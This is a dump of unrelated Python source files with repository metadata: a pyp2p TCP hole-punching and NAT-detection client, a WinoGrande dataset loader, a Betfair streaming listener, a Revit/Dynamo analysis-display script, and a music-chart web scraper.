            If the program is run on the same core then the connects will always
            be out of sync. If that's the case -- tries will need to be set to
            ~1000 which was what it was before. Perhaps a delay could be
            simulated by sleeping for random periods if its a local connection?
            That could help punch through at least once and then just set the
            tries to >= 1000.
            """
            tries = 20  # 20
            local = 1
        source_port = sock.getsockname()[1]
        error = 0
        log.debug("Throwing punch")
        for i in range(0, tries):
            # Attempt to connect.
            try:
                con.connect(node_ip, remote_port)
                log.debug("Sim open success!")
                # FATALITY.
                # Atomic operation so mutex not required.
                # Record hole made.
                con.set_blocking(blocking=0, timeout=5)
                self.simultaneous_cons.append(con)
                return 1
            except Exception as e:
                # Punch was blocked, opponent is strong.
                e = str(parse_exception(e))
                log.debug(e)
                error = 1
                continue
        # All attempts failed: release the socket so the port can be reused.
        if error:
            sock.close()
        return 0
    def simultaneous_fight(self, my_mappings, node_ip, predictions, origin_ntp):
        """
        TCP hole punching algorithm. It uses network time servers to
        synchronize two nodes to connect to each other on their
        predicted remote ports at the exact same time.
        One thing to note is how sensitive TCP hole punching is to
        timing. To open a successful connection both sides need to
        have their SYN packets cross the NAT before the other side's
        SYN arrives. Round-trip time for connections is 0 - 1000ms
        depending on proximity. That's a very small margin of error
        for hole punching, hence using NTP.
        See "TCP Hole Punching" http://www.ietf.org/rfc/rfc5128.txt
        and http://en.wikipedia.org/wiki/TCP_hole_punching
        for more details.

        :param my_mappings: list of mapping dicts holding bound sockets.
        :param node_ip: opponent's IP address.
        :param predictions: list of predicted remote ports (mutated:
                            consumed one per mapping).
        :param origin_ntp: NTP time the opponent proposed for the fight.
        :return: 1 if the fight was attempted, 0 if timing failed.
        """
        # Get current network time accurate to
        # ~50 ms over WAN (apparently.)
        p = request_priority_execution()
        log.debug("Getting NTP")
        if self.sys_clock is not None:
            our_ntp = self.sys_clock.time()
        else:
            our_ntp = get_ntp()
        log.debug("Our ntp = " + str(our_ntp))
        if our_ntp is None:
            return 0
        # Synchronize code execution to occur at their NTP time + delay.
        current = float(our_ntp)
        future = float(origin_ntp) + float(self.ntp_delay)
        sleep_time = future - current
        # Check sleep time:
        log.debug("Waiting for fight")
        if sleep_time < 0:
            log.debug("We missed the meeting! It happened " + str(-sleep_time) +
                      "seconds ago!")
            return 0
        # Sanity bound: refuse to wait more than 5 minutes.
        if sleep_time >= 300:
            log.debug("Future sleep time is too great!")
            return 0
        busy_wait(sleep_time)
        release_priority_execution(p)
        log.debug("At fight")
        """
        Time.sleep isn't guaranteed to sleep for the time specified
        which could cause synchronisation to be off between nodes
        and different OS' as per the discretion of the task scheduler.
        A busy wait is used to increase the accuracy of sleep.
        http://stackoverflow.com/questions/17499837/python-time-sleep-vs-busy-wait-accuracy
        http://stackoverflow.com/questions/1133857/how-accurate-is-pythons-time-sleep
        """
        # Can you dodge my special?
        """
        Making this algorithm "multi-threaded" has the potential to
        ruin predicted mappings for delta type NATs and NATs that
        have no care for source ports and assign incremental
        ports no matter what.
        """
        threads = []
        log.debug("Mapping len " + str(len(my_mappings)))
        for mapping in my_mappings:
            # Tried all predictions.
            prediction_len = len(predictions)
            if not prediction_len:
                break
            # Throw punch.
            prediction = predictions[0]
            if self.nat_type == "delta":
                # Delta NATs must punch sequentially to keep the port
                # allocation order predictable.
                self.throw_punch([mapping["sock"], node_ip, prediction])
            else:
                # Thread params.
                args = ([
                    mapping["sock"],
                    node_ip,
                    prediction
                ], 20)
                # Start thread.
                t = Thread(
                    target=self.throw_punch,
                    args=args
                )
                threads.append(t)
                t.start()
            predictions.remove(prediction)
        # Wait for threads to finish.
        for t in threads:
            t.join()
        return 1
    # Attempt to open an outbound connect through simultaneous open.
    def simultaneous_challenge(self, node_ip, node_port, proto):
        """
        Used by active simultaneous nodes to attempt to initiate
        a simultaneous open to a compatible node after retrieving
        its details from bootstrapping. The function advertises
        itself as a potential candidate to the server for the
        designated node_ip. It also waits for a response from the
        node (if any) and attends any arranged fights.

        :param node_ip: IP of the node to challenge.
        :param node_port: unused here; kept for interface compatibility.
        :param proto: "TCP" or "UDP".
        :return: an open connection from attend_fight, or None.
        """
        parts = self.sequential_connect()
        if parts is None:
            log.debug("Sequential connect failed")
            return None
        con, mappings, predictions = parts
        # Tell server to list ourselves as a candidate for node.
        msg = "CANDIDATE %s %s %s" % (node_ip, str(proto), predictions)
        con.send_line(msg)
        reply = con.recv_line(timeout=10)
        log.debug(reply)
        # NOTE(review): recv_line may return None/"" on timeout, in which
        # case the "in" test below would raise — confirm recv_line contract.
        if "PREDICTION SET" not in reply:
            log.debug("Prediction set failed")
            return None
        # Wait for node to accept and give us fight time.
        # FIGHT 192.168.0.1 4552 345 34235 TCP 123123123.1\
        reply = con.recv_line(timeout=10)
        log.debug(reply)
        con.s.close()
        # Parse: FIGHT <ip> <space-separated ports> <proto> <ntp-float>
        p = "^FIGHT ([0-9]+[.][0-9]+[.][0-9]+[.][0-9]+) ((?:[0-9]+\s?)+)"
        p += " (TCP|UDP) ([0-9]+(?:[.][0-9]+)?)$"
        parts = re.findall(p, reply)
        if not len(parts):
            log.debug("Invalid parts length")
            return None
        node_ip, predictions, proto, ntp = parts[0]
        log.debug("Received fight details")
        log.debug(str(parts[0]))
        log.debug("Attending fight now")
        return self.attend_fight(mappings, node_ip, predictions, ntp)
def parse_remote_port(self, reply):
"""
Parses a remote port from a Rendezvous Server's
response.
"""
remote_port = re.findall("^REMOTE (TCP|UDP) ([0-9]+)$", reply)
if not len(remote_port):
remote_port = 0
else:
remote_port = int(remote_port[0][1])
if remote_port < 1 or remote_port > 65535:
remote_port = 0
return remote_port
    def delta_test(self, mappings):
        """
        This function is designed to find the most commonly occurring
        difference between a set of numbers given a predefined margin
        of error. Its complexity is due to the fact that it allows
        for port collisions which may occur during NAT mapping.
        Its therefore more fault tolerant than simply considering
        the difference between two numbers and hence more accurate
        at determining a delta type NAT.

        :param mappings: list of dicts with an int "remote" key.
        :return: dict {"nat_type": "delta"|"random", "delta": int}
                 (delta is 0 when the NAT is random).
        """
        # Calculate differences between consecutive remote ports; these
        # are the candidate delta values.
        mapping_no = len(mappings)
        differences = []
        for i in range(0, mapping_no):
            # Overflow.
            if i + 1 >= mapping_no:
                break
            differences.append(mappings[i + 1]["remote"] -
                               mappings[i]["remote"])
        differences = list(set(differences))
        # Record delta pattern results.
        delta = 0
        for difference in differences:
            """
            Calculate matches relative to each number for each difference.
            The matches are relative to mappings[i]
            """
            masked = []
            for i in range(0, mapping_no):
                matches = 0
                for j in range(0, mapping_no):
                    # This is ourself.
                    if i == j:
                        continue
                    # Use value of mappings[i] to derive test value
                    # for mappings[j].
                    if i > j:
                        # How many bellow it?
                        test_val = mappings[i]["remote"] -\
                            (difference * (i - j))
                    else:
                        # How many above it?
                        test_val = mappings[i]["remote"] +\
                            (difference * (j - i))
                    # Pattern was predicted for relative comparison so
                    # increment matches.
                    if test_val == mappings[j]["remote"]:
                        matches += 1
                # Matches parses the minimum threshold so these don't count
                # as collisions.
                if matches + 1 > self.port_collisions:
                    masked.append(mappings[i]["remote"])
            # Check number of collisions satisfies delta requirement.
            collision_no = mapping_no - len(masked)
            if collision_no > self.port_collisions:
                continue
            if collision_no == int(mapping_no) / 2 and not mapping_no % 2:
                """
                This means there's no way to be sure. The number of
                collisions can be just as high as the number of
                "successes", in which case it's a stalemate.
                """
                continue
            # This difference fits enough of the mappings: accept it.
            delta = difference
            break
        if delta:
            nat_type = "delta"
        else:
            nat_type = "random"
        ret = {
            "nat_type": nat_type,
            "delta": delta
        }
        return ret
    def determine_nat(self, return_instantly=1):
        """
        This function can predict 4 types of NATS.
        (Not adequately tested yet.)
        1. Preserving.
            Source port == remote port
        2. Delta.
            Remote port == source port + delta.
        3. Delta+1
            Same as delta but delta is only preserved when
            the source port increments by 1 (my understanding I
            may have misunderstood.)
            - This case is handled by manually using incremental,
              sequential ports for punching operations.
        4. Reuse.
            Same source port + addr == previous mapped remote port
            for that connection.
        Good NAT characteristic references and definitions:
        [0] http://nutss.gforge.cis.cornell.edu/pub/imc05-tcpnat.pdf
        [1] http://doc.cacaoweb.org/misc/cacaoweb-and-nats/nat-behavioral-specifications-for-p2p-applications/#tcpholepun
        [2] http://www.deusty.com/2007/07/nat-traversal-port-prediction-part-2-of.html
        http://www.researchgate.net/publication/239801764_Implementing_NAT_Traversal_on_BitTorrent
        [3] http://en.wikipedia.org/wiki/TCP_hole_punching

        :param return_instantly: when truthy, return as soon as a NAT
                                 type is identified instead of running
                                 all remaining tests.
        :return: one of "preserving", "delta", "random" (the reuse test
                 below is currently commented out).
        """
        # Already set.
        if self.nat_type != "unknown":
            return self.nat_type
        nat_type = "random"
        # Check collision ration.
        if self.port_collisions * 5 > self.nat_tests:
            msg = "Port collision number is too high compared to nat tests."
            msg += " Collisions must be in ratio 1 : 5 to avoid ambiguity"
            msg += " in test results."
            raise Exception(msg)
        # Load mappings for reuse test.
        """
        Notes: This reuse test needs to ideally be performed against
        bootstrapping nodes on at least two different addresses and
        ports to each other because there are NAT types which
        allocate new mappings based on changes to these variables.
        """
        def custom_server_con(port=None, servers=None):
            # Get connection to rendezvous server with random
            # source port specified
            servers = servers or self.rendezvous_servers
            con = None
            while con is None:
                try:
                    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    port = port or get_unused_port()
                    sock.bind(('', port))
                    source_port = sock.getsockname()[1]
                    index = random.randrange(0, len(servers))
                    log.debug("Trying index: " + str(index))
                    con = self.server_connect(sock, index, servers)
                except:
                    time.sleep(1)
                    sock.close()
            # Record which server we're connected to.
            server = list(con.s.getpeername())[:]
            server = {
                "addr": server[0],
                "port": server[1]
            }
            # Get the port mappings and instruct remote host to disconnect
            # This gives them the timewait state (we also connect to another
            # server anyway so as to avoid using the exact same con tuple.)
            con.send_line("SOURCE TCP " + str(source_port))
            remote_port = con.recv_line(timeout=2)
            remote_port = self.parse_remote_port(remote_port)
            con.send_line("QUIT")
            return source_port, remote_port, server

        log.debug("Starting initial mappings for preserving + reuse tests")
        mappings = []
        for i in range(0, self.nat_tests):
            src, remote, server = custom_server_con()
            mappings.append({
                "source": src,
                "remote": int(remote),
                "server": server
            })
        log.debug(mappings)
        log.debug(len(mappings))
        log.debug(self.nat_tests)
        log.debug("Finished mappings")
        # Preserving test: count how many mappings kept their source port.
        preserving = 0
        for mapping in mappings:
            if mapping["source"] == mapping["remote"]:
                preserving += 1
        if preserving >= (self.nat_tests - self.port_collisions):
            nat_type = "preserving"
            if return_instantly:
                return nat_type
        # NOTE(review): the reuse test below is deliberately disabled;
        # the delta test therefore runs on the mappings gathered above.
        """
        # Test reuse.
        log.debug("Testing reuse")
        reuse = 0
        for mapping in mappings:
            addr = ("www.example.com", 80)
            servers = self.rendezvous_servers[:]
            servers.remove(mapping["server"])
            log.debug("servers = " + str(servers))
            src, remote, junk = custom_server_con(mapping["source"], servers)
            if remote == mapping["remote"]:
                reuse += 1
        # Check reuse results.
        if reuse >= (self.nat_tests - self.port_collisions):
            nat_type = "reuse"
            if return_instantly:
                return nat_type
        # Load mappings for delta tests.
        mappings = sequential_bind(self.nat_tests, self.interface)
        for i in range(0, self.nat_tests):
            con = self.server_connect(mappings[i]["sock"])
            con.send_line("SOURCE TCP " + str(mappings[i]["source"]))
            remote_port = self.parse_remote_port(con.recv_line(timeout=2))
            mappings[i]["remote"] = int(remote_port)
            con.s.close()
        """
        # Delta test.
        delta_ret = self.delta_test(mappings)
        if delta_ret["nat_type"] != "random":
            # Save delta value.
            self.delta = delta_ret["delta"]
            nat_type = "delta"
            if return_instantly:
                return nat_type
        return nat_type
if __name__ == "__main__":
    # Ad-hoc smoke test: construct a client against the default
    # rendezvous servers (assumes a "preserving" NAT).
    from pyp2p.net import rendezvous_servers
    client = RendezvousClient(nat_type="preserving",
                              rendezvous_servers=rendezvous_servers)
| [
"anmolpanwar8@gmail.com"
] | anmolpanwar8@gmail.com |
196640e93c3fb69f365d16802339e2aa1414300b | 739e41d4f24f79c772d266cded0de9b759c6e953 | /venv/lib/python3.6/site-packages/nlp/datasets/winogrande/61dcf44f5c98e1c1c1526feabb5b487d0362949de206a1208b95d9042b89378c/winogrande.py | 6e0be715a32acff4004245b67b56d63b2cb8574b | [
"MIT"
] | permissive | MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020 | 24b7bbdecf459292f8b58be286feab3b9aa341ba | 82586c632268c103de269bcbffa5f7849b174a29 | refs/heads/main | 2023-05-18T15:41:13.495286 | 2021-06-11T18:21:35 | 2021-06-11T18:21:35 | 304,268,819 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,433 | py | """TODO(winogrande): Add a description here."""
from __future__ import absolute_import, division, print_function
import csv
import json
import os
import nlp
# TODO(winogrande): BibTeX citation
_CITATION = """\
@InProceedings{ai2:winogrande,
title = {WinoGrande: An Adversarial Winograd Schema Challenge at Scale},
authors={Keisuke, Sakaguchi and Ronan, Le Bras and Chandra, Bhagavatula and Yejin, Choi
},
year={2019}
}
"""
# TODO(winogrande):
_DESCRIPTION = """\
WinoGrande is a new collection of 44k problems, inspired by Winograd Schema Challenge (Levesque, Davis, and Morgenstern
2011), but adjusted to improve the scale and robustness against the dataset-specific bias. Formulated as a
fill-in-a-blank task with binary options, the goal is to choose the right option for a given sentence which requires
commonsense reasoning.
"""
# Archive containing every dataset split; extracted by the download manager.
_URL = 'https://storage.googleapis.com/ai2-mosaic/public/winogrande/winogrande_1.1.zip'
# Training-set sizes; one BuilderConfig is generated per size.
_SIZES = ['xs', 's', 'm', 'l', 'xl']
class WinograndeConfig(nlp.BuilderConfig):
    """BuilderConfig for Winogrande."""
    # Bug fix: the docstring previously said "Discofuse" — a copy-paste
    # leftover from another dataset script.

    def __init__(self,
                 data_size,
                 **kwargs
                 ):
        """
        Args:
          data_size: the size of the training set we want to use
            (xs, s, m, l, xl)
          **kwargs: keyword arguments forwarded to super.
        """
        super(WinograndeConfig, self).__init__(
            version=nlp.Version(
                "1.0.0",
                "New split API (https://tensorflow.org/datasets/splits)"),
            **kwargs)
        self.data_size = data_size
class Winogrande(nlp.GeneratorBasedBuilder):
    """Winogrande dataset builder (one config per training-set size)."""

    # TODO(winogrande): Set up version.
    VERSION = nlp.Version('1.1.0')
    # One config per training-set size declared in _SIZES.
    BUILDER_CONFIGS = [
        WinograndeConfig(
            name='winogrande_'+size,
            description='AI2 dataset',
            data_size=size
        ) for size in _SIZES
    ]

    def _info(self):
        """Return the nlp.DatasetInfo describing features and metadata."""
        return nlp.DatasetInfo(
            # This is the description that will appear on the datasets page.
            description=_DESCRIPTION,
            # nlp.features.FeatureConnectors
            features=nlp.Features({
                'sentence': nlp.Value('string'),
                'option1': nlp.Value('string'),
                'option2': nlp.Value('string'),
                'answer': nlp.Value('string')
                # These are the features of your dataset like images, labels ...
            }),
            # If there's a common (input, target) tuple from the features,
            # specify them here. They'll be used if as_supervised=True in
            # builder.as_dataset.
            supervised_keys=None,
            # Homepage of the dataset for documentation
            homepage='https://leaderboard.allenai.org/winogrande/submissions/get-started',
            citation=_CITATION,
        )

    def _split_generators(self, dl_manager):
        """Returns SplitGenerators.

        dl_manager is a nlp.download.DownloadManager used to download
        and extract the archive at _URL.
        """
        dl_dir = dl_manager.download_and_extract(_URL)
        data_dir = os.path.join(dl_dir, 'winogrande_1.1')
        return [
            nlp.SplitGenerator(
                name=nlp.Split.TRAIN,
                # These kwargs will be passed to _generate_examples
                gen_kwargs={
                    'filepath': os.path.join(data_dir, 'train_{}.jsonl'.format(self.config.data_size)),
                    #'labelpath': os.path.join(data_dir, 'train_{}-labels.lst'.format(self.config.data_size)),
                    'split':'train'
                },
            ),
            nlp.SplitGenerator(
                name=nlp.Split.TEST,
                # These kwargs will be passed to _generate_examples
                gen_kwargs={
                    'filepath': os.path.join(data_dir, 'test.jsonl'),
                    'split': 'test'
                },
            ),
            nlp.SplitGenerator(
                name=nlp.Split.VALIDATION,
                # These kwargs will be passed to _generate_examples
                gen_kwargs={
                    'filepath': os.path.join(data_dir, 'dev.jsonl'),
                    #'labelpath': os.path.join(data_dir, 'dev-labels.lst'),
                    'split': 'dev'
                },
            ),
        ]

    def _generate_examples(self, filepath, split):
        """Yields (id, example) tuples read from a JSONL split file.

        The test split carries no gold labels, so 'answer' is emitted
        as an empty string there.
        """
        with open(filepath) as f:
            for id_, row in enumerate(f):
                data = json.loads(row)
                if split=='test':
                    yield id_, {
                        'sentence': data['sentence'],
                        'option1': data['option1'],
                        'option2': data['option2'],
                        'answer': ''
                    }
                else:
                    yield id_,{
                        'sentence': data['sentence'],
                        'option1': data['option1'],
                        'option2': data['option2'],
                        'answer': data['answer']
                    }
# def _generate_test_example(filepath, split, labelpath=None):
# with open(filepath) as f:
# for id_, row in enumerate(f):
# data = json.loads(row)
# yield id_,{
# 'sentence': data['sentence'],
# 'option1': data['option1'],
# 'option2': data['option2'],
# 'answer': None
# }
| [
"adiaz@bcamath.org"
] | adiaz@bcamath.org |
24981d1ca550c828a9733f5955126a18a2d925b3 | 0aa98e0e7d9b63179eaaecd406e0b726594bed1e | /betfairlightweight/streaming/listener.py | c698f37f883a7971c3b36d6f140d8676a5e595c0 | [
"MIT"
] | permissive | alexeypavlenko/betfairlightweight | ce16c60cc8872961ca25452836098c90780ad84a | 3841ca88466abf08152b7a4d2b8fced196307105 | refs/heads/master | 2021-01-11T12:26:51.787855 | 2016-12-11T09:06:29 | 2016-12-11T09:06:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import json
import logging
import time
from .stream import MarketStream, OrderStream
class BaseListener:
    """Base stream listener: tracks at most one market stream and one
    order stream, replacing an existing stream when a subscription of
    the same kind is registered again."""

    def __init__(self):
        # Streams are created lazily by register_stream().
        self.market_stream = None
        self.order_stream = None

    def register_stream(self, unique_id, operation):
        """Record a stream for the given subscription operation."""
        if operation == 'authentication':
            logging.info('[Listener: %s]: %s' % (unique_id, operation))
            return
        if operation == 'marketSubscription':
            if self.market_stream is not None:
                # Re-registering discards the previous cache.
                logging.warning('[Listener: %s]: marketSubscription stream already registered, replacing data' %
                                unique_id)
            self.market_stream = self._add_stream(unique_id, operation)
        elif operation == 'orderSubscription':
            if self.order_stream is not None:
                logging.warning('[Listener: %s]: orderSubscription stream already registered, replacing data' %
                                unique_id)
            self.order_stream = self._add_stream(unique_id, operation)

    def on_data(self, raw_data):
        """Default handler: just echo the raw payload."""
        print(raw_data)

    def _add_stream(self, unique_id, operation):
        """Placeholder factory; subclasses return a real stream object."""
        print('Register: %s %s' % (operation, unique_id))

    def __str__(self):
        return '<BaseListener>'

    def __repr__(self):
        return str(self)
class StreamListener(BaseListener):
    """Stream listener, processes results from socket,
    holds a market and order stream which hold
    market_book caches
    """

    def __init__(self, output_queue=None):
        # output_queue: optional queue that the streams push updates onto.
        super(StreamListener, self).__init__()
        self.output_queue = output_queue

    def on_data(self, raw_data):
        """Called when raw data is received from connection.
        Override this method if you wish to manually handle
        the stream data

        :param raw_data: Received raw data
        :return: Return False to stop stream and close connection
        """
        try:
            data = json.loads(raw_data)
        except ValueError:
            logging.error('value error: %s' % raw_data)
            return
        unique_id = data.get('id')
        if self._error_handler(data, unique_id):
            return False
        # Dispatch by operation type.
        operation = data.get('op')
        if operation == 'connection':
            self._on_connection(data, unique_id)
        elif operation == 'status':
            self._on_status(data, unique_id)
        elif operation == 'mcm' or operation == 'ocm':
            self._on_change_message(data, unique_id)

    def _on_connection(self, data, unique_id):
        """Called on collection operation

        :param data: Received data
        """
        self.connection_id = data.get('connectionId')
        logging.info('[Connect: %s]: connection_id: %s' % (unique_id, self.connection_id))

    @staticmethod
    def _on_status(data, unique_id):
        """Called on status operation

        :param data: Received data
        """
        status_code = data.get('statusCode')
        logging.info('[Subscription: %s]: %s' % (unique_id, status_code))

    def _on_change_message(self, data, unique_id):
        # Default change type is UPDATE when 'ct' is absent.
        change_type = data.get('ct', 'UPDATE')
        operation = data.get('op')
        # 'mcm' messages go to the market stream, everything else ('ocm')
        # goes to the order stream.
        if operation == 'mcm':
            stream = self.market_stream
        else:
            stream = self.order_stream
        logging.debug('[Subscription: %s]: %s: %s' % (unique_id, change_type, data))
        if change_type == 'SUB_IMAGE':
            stream.on_subscribe(data)
        elif change_type == 'RESUB_DELTA':
            stream.on_resubscribe(data)
        elif change_type == 'HEARTBEAT':
            stream.on_heartbeat(data)
        elif change_type == 'UPDATE':
            stream.on_update(data)

    def _add_stream(self, unique_id, stream_type):
        # Factory for the concrete stream caches.
        if stream_type == 'marketSubscription':
            return MarketStream(unique_id, self.output_queue)
        elif stream_type == 'orderSubscription':
            return OrderStream(unique_id, self.output_queue)

    @staticmethod
    def _error_handler(data, unique_id):
        """Called when data first received

        :param data: Received data
        :param unique_id: Unique id
        :return: True if error present
        """
        status_code = data.get('statusCode')
        connection_closed = data.get('connectionClosed')
        if status_code == 'FAILURE':
            logging.error('[Subscription: %s] %s: %s' %
                          (unique_id, data.get('errorCode'), data.get('errorMessage')))
            if connection_closed:
                return True

    def __str__(self):
        return '<StreamListener>'

    def __repr__(self):
        return str(self)
| [
"paulingliam@gmail.com"
] | paulingliam@gmail.com |
d361163583c2c32c54d91c8e8707524d150b297a | a110cda0dd755a0aeeccaa349de5b7c8f836f7d9 | /Dynamo_0.7.X/markerAndTextDisplayStyle.py | 390152422c99ba55f8f8ecbba14bd663d5c5819d | [] | no_license | ksobon/archi-lab | 26d93ef07e4f571e73a78bc40299edd3dc84c2a6 | 9a8a57eccca899ace78a998dc7698ff7754fae6b | refs/heads/master | 2021-01-15T09:37:06.045588 | 2020-06-03T15:55:46 | 2020-06-03T15:55:46 | 26,090,112 | 6 | 5 | null | 2020-02-09T04:24:41 | 2014-11-02T19:02:28 | Python | UTF-8 | Python | false | false | 4,562 | py | #Copyright(c) 2015, Konrad K Sobon
# @arch_laboratory, http://archi-lab.net
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
from System.Collections.Generic import *
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
from Autodesk.Revit.DB.Analysis import *
doc = DocumentManager.Instance.CurrentDBDocument
uiapp = DocumentManager.Instance.CurrentUIApplication
app = uiapp.Application
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
#The inputs to this node will be stored as a list in the IN variable.
dataEnteringNode = IN
points = IN[0]
values = IN[1]
colorSettings = IN[2]
legendSettings = IN[3]
markerSettings = IN[4]
displayStyleName = IN[5]
analysisResultName = IN[6]
analysisResultDescription = IN[7]
unitNames = IN[8]
unitMultipliers = IN[9]
displayUnit = IN[10]
message = ""
def dsPointToRvtPoint(dsPoint):
    """Convert a Dynamo/DesignScript point (metres) to a Revit XYZ (feet)."""
    METERS_TO_FEET = 3.2808398950
    return Autodesk.Revit.DB.XYZ(
        dsPoint.X * METERS_TO_FEET,
        dsPoint.Y * METERS_TO_FEET,
        dsPoint.Z * METERS_TO_FEET
    )
def chunks(data, n):
    """Split *data* into consecutive slices of at most *n* items.

    Values of *n* below 1 are clamped to 1 so the slicing never stalls.
    """
    size = max(n, 1)
    return [data[start:start + size] for start in range(0, len(data), size)]
#"Start" the transaction
TransactionManager.Instance.EnsureInTransaction(doc)
#create spatial field manager if one doesnt already exist
sfm = SpatialFieldManager.GetSpatialFieldManager(doc.ActiveView)
if sfm == None:
sfm = SpatialFieldManager.CreateSpatialFieldManager(doc.ActiveView, 1)
sfm.Clear()
#get result schema index if existing else crete one
regResults = sfm.GetRegisteredResults()
if len(regResults) != 0:
for i in regResults:
if sfm.GetResultSchema(i).Name == analysisResultName:
resultSchema = sfm.GetResultSchema(i)
else:
resultSchema = AnalysisResultSchema(analysisResultName, analysisResultDescription)
names = List[str]()
multipliers = List[float]()
for i,j in zip(unitMultipliers, unitNames):
multipliers.Add(i)
names.Add(j)
resultSchema.SetUnits(names, multipliers)
for i in range(0, resultSchema.GetNumberOfUnits(), 1):
if resultSchema.GetUnitsName(i) == displayUnit:
resultSchema.CurrentUnits = i
message = "Success! Remember that your current \ndisplay units are set to " + displayUnit
else:
continue
if resultSchema.GetUnitsName(resultSchema.CurrentUnits) != displayUnit:
message = "Display Units supplied not available. \nEither add those units to results or \nspecify one of the already supplied."
schemaIndex = sfm.RegisterResult(resultSchema)
#create spatial field primitives and assign values to points
points = chunks(points, 999)
values = chunks(values, 999)
for i, j in zip(points, values):
fieldPoints = List[Autodesk.Revit.DB.XYZ]()
for point in i:
fieldPoints.Add(dsPointToRvtPoint(point))
pnts = FieldDomainPointsByXYZ(fieldPoints)
fieldPoints.Clear()
valList = List[ValueAtPoint]()
doubleList = List[float]()
for value in j:
doubleList.Add(float(value))
valList.Add(ValueAtPoint(doubleList))
doubleList.Clear()
vals = FieldValues(valList)
valList.Clear()
idx = sfm.AddSpatialFieldPrimitive()
sfm.UpdateSpatialFieldPrimitive(idx, pnts, vals, schemaIndex)
#define analysis display style and set legend/color settings
collector = FilteredElementCollector(doc)
collection = collector.OfClass(AnalysisDisplayStyle).ToElements()
displayStyle = []
for i in collection:
if i.Name == displayStyleName and i.HasMarkersAndTextSettings():
displayStyle.append(i)
elif i.Name == displayStyleName and not i.HasMarkersAndTextSettings():
message = "Specified Display Style name already \nexists; please supply different name"
else:
continue
if len(displayStyle) == 0:
try:
analysisDisplayStyle = AnalysisDisplayStyle.CreateAnalysisDisplayStyle(doc, displayStyleName, markerSettings, colorSettings, legendSettings)
except:
pass
else:
analysisDisplayStyle = displayStyle[0]
analysisDisplayStyle.SetLegendSettings(legendSettings)
analysisDisplayStyle.SetColorSettings(colorSettings)
analysisDisplayStyle.SetMarkersAndTextSettings(markerSettings)
try:
doc.ActiveView.AnalysisDisplayStyleId = analysisDisplayStyle.Id
except:
pass
# "End" the transaction
TransactionManager.Instance.TransactionTaskDone()
#Assign your output to the OUT variable
if len(message) != 0:
OUT = '\n'.join('{:^35}'.format(s) for s in message.split('\n'))
else:
OUT = 0
| [
"ksobon1986@gmail.com"
] | ksobon1986@gmail.com |
941fad21374a597dfb5c097d482af2e93d687dab | 2951174fd6d8a7cf9a71e0663ae3b22bd309be5a | /yinyuetai.py | ef78c8285d10e9124070a491e1d831f446d99c16 | [] | no_license | WhiteBrownBottle/Python- | c76045a3127723666083cee4b4c20b08491e4067 | 92fcaba555a566eae829ea401a20f459b4f39dfe | refs/heads/master | 2021-07-18T21:17:45.677091 | 2017-10-24T06:47:38 | 2017-10-24T06:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,953 | py | import os
import requests
import bs4
import random
def get_html(url):
    """
    Fetch *url* and return the decoded page text.

    Returns the literal string 'Something wrong!' on any failure
    (connection error, timeout, or non-2xx HTTP status).
    """
    try:
        r = requests.get(url, timeout=30)
        # Bug fix: raise_for_status was referenced without calling it,
        # so HTTP error statuses were silently ignored.
        r.raise_for_status()
        r.encoding = r.apparent_encoding
        return r.text
    except Exception:
        return 'Something wrong!'
def get_agent():
    """
    Fake the request header's user-agent field.

    :return: a dict with a single 'User-agent' key holding a randomly
             chosen browser agent string.
    """
    agents = ['Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1',
              'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
              'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
              'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)']
    fakeheader = {}
    # Bug fix: random.randint(0, len(agents)) is inclusive on both ends,
    # so it raised IndexError ~1/6 of the time; random.choice is safe.
    fakeheader['User-agent'] = random.choice(agents)
    return fakeheader
def get_proxy():
    """
    Simulate a simple proxy pool.

    :return: a dict with a single 'http' key holding a randomly chosen
             proxy URL.
    """
    proxy = ["http://203.91.121.76:3128",
             "http://123.7.38.31:9999",
             "http://218.56.132.155:8080",
             "http://220.249.185.178:9999",
             "http://218.66.253.145:8800",
             "http://110.73.15.81:80",
             "http://61.163.39.70:9999",
             "http://27.44.174.134:9999"]
    fakepxs = {}
    # Bug fix: random.randint(0, len(proxy)) could return len(proxy) and
    # raise IndexError; random.choice avoids the off-by-one.
    fakepxs['http'] = random.choice(proxy)
    return fakepxs
def get_content(url):
    """Print the chart header for *url*'s region, then print every MV
    entry (rank, score, name, release date, artist) found on the page."""
    # Print the chart header based on the area code at the end of the URL.
    if url[-2:] == 'ML':
        print('内地排行榜')
    elif url[-2:] == 'HT':
        print('港台排行榜')
    elif url[-2:] == 'US':
        print('欧美排行榜')
    elif url[-2:] == 'KR':
        print('韩国排行榜')
    else:
        print('日本排行榜')
    # Locate every chart entry tag we need.
    html = get_html(url)
    soup = bs4.BeautifulSoup(html, 'lxml')
    li_list = soup.find_all('li', attrs={'name' : 'dmvLi'})
    for li in li_list:
        match = {}
        try:
            # Score may be rendered as descending or ascending.
            if li.find('h3', class_='desc_score'):
                match['分数'] = li.find('h3', class_='desc_score').text
            else:
                match['分数'] = li.find('h3', class_='asc_score').text
            match['排名'] = li.find('div', class_='top_num').text
            match['名字'] = li.find('a', class_='mvname').text
            match['发布时间'] = li.find('p', class_='c9').text
            match['歌手'] = li.find('a', class_='special').text
        except:
            # NOTE(review): any malformed entry aborts the whole chart
            # (returns "") instead of skipping the entry — confirm intent.
            return ""
